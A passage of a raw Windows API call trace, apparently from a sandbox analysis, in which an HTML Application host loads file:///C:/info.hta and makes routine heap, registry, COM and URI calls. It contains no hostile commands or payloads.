0x1 [0223.204] IUnknown:Release (This=0x5bb834) returned 0x2 [0223.204] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad690 [0223.204] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4768 [0223.204] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5c) returned 0x5c3bc8 [0223.204] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.204] GetDeviceCaps (hdc=0xab0101eb, index=88) returned 96 [0223.204] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.204] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0223.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eeaf0 | out: phkResult=0x1eeaf0*=0x130) returned 0x0 [0223.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eeaf4 | out: phkResult=0x1eeaf4*=0x198) returned 0x0 [0223.205] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1eeab0 | out: phkResult=0x1eeab0*=0x0) returned 0x2 [0223.205] RegOpenKeyExW (in: hKey=0x130, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1eeab0 | out: phkResult=0x1eeab0*=0x0) returned 0x2 [0223.205] RegCloseKey (hKey=0x0) returned 0x6 [0223.205] RegCloseKey (hKey=0x0) returned 0x6 [0223.205] RegCloseKey (hKey=0x130) returned 0x0 [0223.205] RegCloseKey (hKey=0x198) returned 0x0 [0223.205] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a49a8 [0223.205] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x44) returned 0x5a9360 [0223.205] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5c) returned 0x5cb2c8 [0223.205] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0223.205] GetProcAddress (hModule=0x76180000, lpProcName="InitializeSRWLock") returned 0x76f48456 [0223.206] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockExclusive") returned 0x76f429f1 [0223.206] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockShared") returned 0x76f42560 [0223.206] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockExclusive") returned 0x76f429ab [0223.206] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockShared") returned 0x76f425a9 [0223.206] RtlInitializeConditionVariable () returned 0x5cb2fc [0223.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5c3c30 [0223.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5cb330 [0223.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3420 [0223.206] IUnknown:Release (This=0x74478cb0) returned 0x1 [0223.206] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5ad068 [0223.283] IUnknown_QueryService (in: punk=0x744796a4, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x5c16a8 | out: ppvOut=0x5c16a8*=0x0) returned 0x80004005 [0223.283] IUnknown:QueryInterface (in: This=0x744796a4, riid=0x766142d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x1ef838 | out: ppvObject=0x1ef838*=0x744796b8) returned 0x0 [0223.283] IServiceProvider:QueryService (in: This=0x744796b8, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x5c16a8 | out: ppvObject=0x5c16a8*=0x0) returned 0x80004005 [0223.283] IUnknown:Release (This=0x744796b8) returned 0x1 [0223.283] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x34) returned 0x5cb370 [0223.283] IInternetSecurityManager:SetSecuritySite (This=0x5c35a8, pSite=0x5c1d8c) returned 0x0 [0223.283] IUnknown:Release (This=0x5c1d8c) returned 0x0 [0223.283] IUnknown:AddRef (This=0x5c1d8c) returned 0x28 [0223.284] IUnknown:QueryInterface (in: This=0x5c1d8c, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x1ef870 | out: ppvObject=0x1ef870*=0x5c1d90) returned 0x0 [0223.284] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x5c35d0 | out: ppvObject=0x5c35d0*=0x0) returned 0x80004002 [0223.284] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x5c35cc | out: ppvObject=0x5c35cc*=0x0) returned 0x80004002 [0223.284] IServiceProvider:QueryService (in: This=0x5c1d90, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5c35c8 | out: ppvObject=0x5c35c8*=0x744796bc) returned 0x0 [0223.284] IUnknown:Release (This=0x5c1d90) returned 0x0 [0223.284] CoTaskMemAlloc (cb=0x6d) returned 0x5cb3b0 [0223.284] CoTaskMemAlloc (cb=0x9) returned 0x5a4720 [0223.284] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5bdd40 [0223.284] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5cb428 [0223.314] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0223.314] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a93b0 [0223.317] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5bdd58 [0223.317] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdd70 [0223.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5bb6c0 [0223.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x5c42a8 [0223.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5bdd88 [0223.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x94) returned 0x5cb480 [0223.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5cb520 [0223.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x70) returned 0x5cb560 [0223.347] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf8) returned 0x5cb5d8 [0223.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8b4) returned 0x5cb6d8 [0223.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdda0 [0223.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bddb8 [0223.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x84) returned 0x5cbf98 [0223.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x800) returned 0x5cc028 [0223.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x800) returned 0x5cc830 [0223.465] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4c) returned 0x5cd038 [0223.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x800) returned 0x5cd090 [0223.466] IsCharSpaceW (wch=0x48) returned 0 [0223.466] IsCharAlphaNumericW (ch=0x5c) returned 0 [0223.466] IsCharSpaceW (wch=0x5c) returned 0 [0223.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5b3440 [0223.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5cd898 [0223.466] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3460 [0223.467] IsCharSpaceW (wch=0x41) returned 0 [0223.467] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5bddd0 [0223.467] IsCharAlphaNumericW (ch=0x20) returned 0 [0223.467] IsCharSpaceW (wch=0x20) returned 1 [0223.467] IsCharSpaceW (wch=0x7b) returned 0 [0223.467] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c42d0 [0223.467] IsCharSpaceW (wch=0x20) returned 1 [0223.467] IsCharAlphaNumericW (ch=0x7b) returned 0 [0223.467] IsCharSpaceW (wch=0x62) returned 0 [0223.467] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cd898 | out: hHeap=0x590000) returned 1 [0223.467] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.467] IsCharSpaceW (wch=0x3a) returned 0 [0223.467] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c42f8 [0223.546] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.546] IsCharSpaceW (wch=0x75) returned 0 [0223.546] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.546] IsCharSpaceW (wch=0x28) returned 0 [0223.546] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.546] IsCharSpaceW (wch=0x23) returned 0 [0223.546] IsCharSpaceW (wch=0x23) returned 0 [0223.546] IsCharSpaceW (wch=0x7d) returned 0 [0223.546] IsCharAlphaNumericW (ch=0x7d) returned 0 [0223.546] IsCharSpaceW (wch=0x29) returned 0 [0223.546] IsCharSpaceW (wch=0x75) returned 0 [0223.546] IsCharSpaceW (wch=0x75) returned 0 [0223.546] IsCharSpaceW (wch=0x29) returned 0 [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b34a0 [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5cdaa0 [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a3fc0 [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdde8 [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bde00 [0223.546] CoTaskMemFree (pv=0x5cb3b0) [0223.546] CoTaskMemFree (pv=0x5a4720) [0223.546] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5b34c0 [0223.546] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76340000 [0223.547] GetProcAddress (hModule=0x76340000, lpProcName=0x6) returned 0x76343e59 [0223.547] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0223.547] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x340) returned 0x5cdae0 [0223.547] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4a) returned 0x5cde40 [0223.547] IsOS (dwOS=0x25) returned 1 [0223.547] GetSysColor (nIndex=26) returned 0xcc6600 [0223.547] IsOS (dwOS=0x25) returned 1 [0223.547] GetSysColor (nIndex=5) returned 0xffffff [0223.547] GetSysColor (nIndex=8) returned 0x0 [0223.547] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.547] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4720 [0223.582] wcstol (in: _String="0,0,255", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*=",0,255") returned 0 [0223.582] wcstol (in: _String="0,255", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*=",255") returned 0 [0223.582] wcstol (in: _String="255", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*="") returned 255 [0223.582] wcstol (in: _String="128,0,128", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*=",0,128") returned 128 [0223.582] wcstol (in: _String="0,128", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*=",128") returned 0 [0223.582] wcstol (in: _String="128", _EndPtr=0x1ee4cc, _Radix=10 | out: _EndPtr=0x1ee4cc*="") returned 128 [0223.592] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0223.592] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0223.592] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef584 | out: phkResult=0x1ef584*=0xa8) returned 0x0 [0223.592] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x1ef588, pcbData=0x1ef580*=0xa | out: pdwType=0x0, pvData=0x1ef588, pcbData=0x1ef580*=0xa) returned 0x2 [0223.592] RegCloseKey (hKey=0xa8) returned 0x0 [0223.592] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x80) returned 0x5d0228 [0223.592] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdd28 [0223.593] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3a) returned 0x5a4050 [0223.593] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6a) returned 0x5d02b0 [0223.626] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4750 [0223.626] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x26) returned 0x5ad098 [0223.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6e) returned 0x5d0328 [0223.628] GetProcessHeap () returned 0x590000 [0223.628] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cb3b0 | out: hHeap=0x590000) returned 1 [0223.628] GetProcessHeap () returned 0x590000 [0223.628] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf240 | out: hHeap=0x590000) returned 1 [0223.628] GetProcessHeap () returned 0x590000 [0223.628] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bb6d0 | out: hHeap=0x590000) returned 1 [0223.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b34e0 [0223.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4780 [0223.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3500 [0223.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a4098 [0223.629] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5cb3b0 [0223.629] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x24) returned 0x5ad0c8 [0223.629] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c4348 [0223.629] GetAcceptLanguagesW () returned 0x0 [0223.629] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4960 [0223.629] GetClassNameW (in: hWnd=0x20160, lpClassName=0x1ef854, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.629] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.629] GetParent (hWnd=0x20160) returned 0x40110 [0223.629] GetClassNameW (in: hWnd=0x40110, lpClassName=0x1ef854, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.630] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.630] GetParent (hWnd=0x40110) returned 0x0 [0223.630] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5b3520 [0223.630] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5ad0f8 [0223.630] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b3520 | out: hHeap=0x590000) returned 1 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5cde98 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x5ceea0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x94) returned 0x5d03a0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5b3520 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5b3540 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5b3560 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x5ceeb8 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5ceed0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x5ceee8 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5cef00 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c4370 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1a) returned 0x5c4398 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1a) returned 0x5c43c0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b3580 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b35a0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b35c0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b35e0 [0223.674] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5cef18 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5cef48 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5cef60 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b3600 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x5cef78 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa) returned 0x5cef90 [0223.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x26) returned 0x5ad128 [0223.675] GetProcessHeap () returned 0x590000 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c43e8 | out: hHeap=0x590000) returned 1 [0223.675] GetProcessHeap () returned 0x590000 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4410 | out: hHeap=0x590000) returned 1 [0223.675] GetProcessHeap () returned 0x590000 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4438 | out: hHeap=0x590000) returned 1 [0223.675] GetProcessHeap () returned 0x590000 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdc38 | out: hHeap=0x590000) returned 1 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cef18 | out: hHeap=0x590000) returned 1 [0223.675] IMoniker:GetDisplayName (in: This=0x5a0570, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x1ef818 | out: ppszDisplayName=0x1ef818*="file:///C:/info.hta") returned 0x0 [0223.675] IUnknown:QueryInterface (in: This=0x5a0570, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x1ef7f0 | out: ppvObject=0x1ef7f0*=0x5a057c) returned 0x0 [0223.675] IUriContainer:GetIUri (in: This=0x5a057c, ppIUri=0x1ef820 | out: ppIUri=0x1ef820*=0x5bbbac) returned 0x0 [0223.675] IUnknown:Release (This=0x5a057c) returned 0x1 [0223.675] IUnknown:AddRef (This=0x5a0570) returned 0x2 [0223.675] IUnknown:AddRef (This=0x5bbbac) returned 0x5 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.675] IMoniker:GetDisplayName (in: This=0x5a0570, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x1ef6f8 | out: ppszDisplayName=0x1ef6f8*="file:///C:/info.hta") returned 0x0 [0223.675] UrlGetLocationW (psz1="file:///C:/info.hta") returned 0x0 [0223.676] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/info.hta", ppmk=0x1ef6c4*=0x0, dwFlags=0x1 | out: ppmk=0x1ef6c4*=0x5cf240) returned 0x0 [0223.676] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x1ef6bc | out: ppURI=0x1ef6bc*=0x5bbf0c) returned 0x0 [0223.676] IUri:GetScheme (in: This=0x5bbf0c, pdwScheme=0x1ef654 | out: pdwScheme=0x1ef654*=0x9) returned 0x0 [0223.676] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0223.676] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.676] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5c4438 [0223.676] IUnknown:AddRef (This=0x5bbf0c) returned 0x5 [0223.676] IUri:GetAbsoluteUri (in: This=0x5bbf0c, pbstrAbsoluteUri=0x5c4438 | out: pbstrAbsoluteUri=0x5c4438*="file:///C:/info.hta") returned 0x0 [0223.676] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0223.676] IUnknown:AddRef (This=0x5cf240) returned 0x2 [0223.676] IUnknown:Release (This=0x5cf240) returned 0x1 [0223.676] IUnknown:AddRef (This=0x5a0570) returned 0x3 [0223.676] IUnknown:Release (This=0x5cf240) returned 0x0 [0223.676] IUnknown:AddRef (This=0x5a0570) returned 0x4 [0223.676] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef4c4 | out: ppvObject=0x1ef4c4*=0x5bbbac) returned 0x0 [0223.677] IUnknown:Release (This=0x5bbbac) returned 0x5 [0223.677] IUnknown:AddRef (This=0x5bbbac) returned 0x6 [0223.677] IUnknown:QueryInterface (in: This=0x5a0570, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x1ef498 | out: ppvObject=0x1ef498*=0x5a057c) returned 0x0 [0223.677] IUriContainer:GetIUri (in: This=0x5a057c, ppIUri=0x1ef4ec | out: ppIUri=0x1ef4ec*=0x5bbbac) returned 0x0 [0223.677] IUnknown:Release (This=0x5a057c) returned 0x4 [0223.677] IUnknown:AddRef (This=0x5a0570) returned 0x5 [0223.677] IUnknown:Release (This=0x5a0570) returned 0x4 [0223.677] IUnknown:AddRef (This=0x5bbbac) returned 0x8 [0223.677] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef4c4 | out: ppvObject=0x1ef4c4*=0x5bbbac) returned 0x0 [0223.677] IUnknown:Release (This=0x5bbbac) returned 0x8 [0223.677] IUnknown:AddRef (This=0x5bbbac) returned 0x9 [0223.677] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x1ef4bc | out: pdwScheme=0x1ef4bc*=0x9) returned 0x0 [0223.677] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc8) returned 0x5d0c40 [0223.677] GetCurrentProcessId () returned 0x124 [0223.677] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef4c4 | out: ppvObject=0x1ef4c4*=0x5bbbac) returned 0x0 [0223.677] IUnknown:Release (This=0x5bbbac) returned 0x9 [0223.677] IUnknown:AddRef (This=0x5bbbac) returned 0xa [0223.677] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x1ef494 | out: pdwScheme=0x1ef494*=0x9) returned 0x0 [0223.677] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef448 | out: ppvObject=0x1ef448*=0x5bbbac) returned 0x0 [0223.677] IUnknown:Release (This=0x5bbbac) returned 0xa [0223.677] IUnknown:AddRef (This=0x5bbbac) returned 0xb [0223.677] IUnknown:Release (This=0x5bbbac) returned 0xa [0223.677] IUri:GetAbsoluteUri (in: This=0x5bbbac, pbstrAbsoluteUri=0x1ef4c4 | out: pbstrAbsoluteUri=0x1ef4c4*="file:///C:/info.hta") returned 0x0 [0223.677] GetProcAddress (hModule=0x76340000, lpProcName=0x7) returned 0x76344680 [0223.677] SysStringLen (param_1="file:///C:/info.hta") returned 0x13 [0223.678] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ef4e0 | out: ppURI=0x1ef4e0*=0x5bc0bc) returned 0x0 [0223.678] IUnknown:Release (This=0x5bbbac) returned 0x9 [0223.678] IUri:GetScheme (in: This=0x5bc0bc, pdwScheme=0x1ef474 | out: pdwScheme=0x1ef474*=0x9) returned 0x0 [0223.678] IUri:IsEqual (in: This=0x5bbf0c, pUri=0x5bc0bc, pfEqual=0x1ef4bc | out: pfEqual=0x1ef4bc*=1) returned 